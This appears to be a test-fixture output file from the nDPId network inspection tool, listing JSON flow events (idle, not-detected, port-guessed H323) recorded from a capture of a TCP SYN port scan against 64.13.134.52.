+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 